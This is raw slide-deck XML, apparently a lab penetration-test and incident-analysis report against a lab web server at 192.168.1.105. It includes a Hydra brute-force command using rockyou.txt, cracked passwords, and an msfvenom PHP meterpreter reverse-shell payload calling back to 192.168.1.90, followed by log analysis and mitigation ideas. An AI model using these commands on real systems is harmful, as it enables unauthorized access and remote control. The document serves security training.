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Thin"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
      <p:italic r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold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Roboto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5969DB-620A-4678-A406-667909591162}">
  <a:tblStyle styleId="{DE5969DB-620A-4678-A406-6679095911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Italic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robo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regular.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.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Black-bold.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-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fa7627cdf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fa7627cdf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fa7627cd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fa7627cd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7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4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39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId5"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58.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2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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7.png"/><Relationship Id="rId7"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image" Target="../media/image72.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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0.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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7.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85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId5"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9.png"/><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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId5"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5.png"/><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s://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanne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cwe.mitre.org/data/definitions/548.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/521.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cwe.mitre.org/data/definitions/434.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192.168.1.105" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId5"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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exposure of Sensitive Information to an Unauthorized Actor</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1117" name="Google Shape;111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8" name="Google Shape;1118;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web browser was used to investigate alaviable information for anything that might lead to further exploitation.</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20" name="Google Shape;1120;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1121" name="Google Shape;1121;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2" name="Google Shape;112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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;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5" name="Google Shape;1125;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413625" y="1480625"/>
            <a:ext cx="25107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Two pieces of information were immediately available.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Those information are that there is a secret folder and the path to that folder is company_folders/secret_folder, as well as the fact that an employee named Ashton is responsible for this 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This info was found in 192.168.1.105/meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1129" name="Google Shape;1129;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0" name="Google Shape;1130;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33" name="Google Shape;1133;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969100" y="1480583"/>
            <a:ext cx="3000450" cy="1261617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969100" y="2934175"/>
            <a:ext cx="3000450" cy="15683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Weak Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140;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1" name="Google Shape;1141;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was used in conjunction with a rockyou text file to crack ashtons password.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following command was used to achieve this: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-l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get http://192.168.1.105/company_folders/secret_folder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3" name="Google Shape;1143;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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5" name="Google Shape;1145;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1147" name="Google Shape;1147;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8" name="Google Shape;1148;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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3342400" y="1480625"/>
            <a:ext cx="25824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This brute force attack gave Ashtons password (leopoldo), resulting in access to the secret folder.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In the secret folder was a file with information on how to connect to the “corp server”. This included instructions to connect to webdav, and a hash for Ryans password. This hash was cracked with “Free Password Hash Cracker” to reveal the password of “linux4u”</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1152" name="Google Shape;1152;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3" name="Google Shape;1153;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64"/>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4"/>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56" name="Google Shape;1156;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="40081" l="556" r="0" t="37998"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113075" y="1643575"/>
            <a:ext cx="2947700" cy="184475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083698" y="1872550"/>
            <a:ext cx="3006474" cy="941500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113075" y="2854201"/>
            <a:ext cx="2877475" cy="103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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Unrestricted Upload of File with Dangerous Type</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;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5" name="Google Shape;1165;p65"/>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355450" y="1480625"/>
            <a:ext cx="27402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The webdav directory could be accessed via file manager. This allows for the upload of malicious payloads to the webdav directory, which can then be executed via the browser granting a persistent reverse shell to the server.</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The payload was named shell.php and made with the following command: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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=55555 -f raw &gt; shell.php</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Msfconsole was used to facilitate the metasploit connection</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67" name="Google Shape;1167;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1168" name="Google Shape;1168;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69" name="Google Shape;1169;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65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1171" name="Google Shape;1171;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72" name="Google Shape;1172;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65"/>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 malicious PHP file was successfully uploaded to the webdav directory, ultimately resulting in a persistent reverse shell with the web server in the form of metasploit.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1176" name="Google Shape;1176;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77" name="Google Shape;1177;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65"/>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5"/>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80" name="Google Shape;1180;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6184425" y="1481375"/>
            <a:ext cx="2488225" cy="1971100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969212" y="3452463"/>
            <a:ext cx="2918625" cy="139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id="1186" name="Google Shape;1186;p6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7" name="Google Shape;1187;p66"/>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88" name="Google Shape;1188;p6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94" name="Google Shape;1194;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5" name="Google Shape;1195;p67"/>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196" name="Google Shape;1196;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599200" y="675975"/>
            <a:ext cx="80238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Nmap scans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> at 00:00:40.000 on October 28, 2021</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>50,582 packets were sent from 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The 8 most common ports were filtered out to find this data. Thousands of different ports were hit, indicating Nmap scans.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447400" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1600894"/>
            <a:ext cx="9143998" cy="21179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04" name="Google Shape;1204;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5" name="Google Shape;1205;p68"/>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206" name="Google Shape;1206;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603625" y="741325"/>
            <a:ext cx="84771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requests for the hidden directory began to occur at 00:50:00.000. 6 requests were made.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The file “connect_to_corp_server” was requested which contained instruction on how to connect to the WebMD server, as well as a hash revealing Ryans password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447425" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1467832"/>
            <a:ext cx="9144000" cy="33382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14" name="Google Shape;1214;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5" name="Google Shape;1215;p69"/>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216" name="Google Shape;1216;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603625" y="735250"/>
            <a:ext cx="81729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60,255 requests were made during the attack.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>60,211 requests were made before the attacker discovered the password</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447400" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1226068"/>
            <a:ext cx="9144000" cy="1982165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2195341"/>
            <a:ext cx="9143998" cy="29481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25" name="Google Shape;1225;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6" name="Google Shape;1226;p70"/>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27" name="Google Shape;1227;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597525" y="6989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14 requests were made to this directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The Files requested include index.html, passwd.dav, and shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447400" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1623723"/>
            <a:ext cx="9143999" cy="20722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7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35" name="Google Shape;1235;p71"/>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36" name="Google Shape;1236;p7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42" name="Google Shape;1242;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3" name="Google Shape;1243;p72"/>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To detect further port scans, an alarm should be set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> triggers when a large number of different ports are hit in a short amount of time. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Over 10 non port 80 or 443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ports are hit in the same timestamp.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244" name="Google Shape;1244;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="48573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150">
                <a:solidFill>
                  <a:srgbClr val="232629"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can create ipset lists</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="232629"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
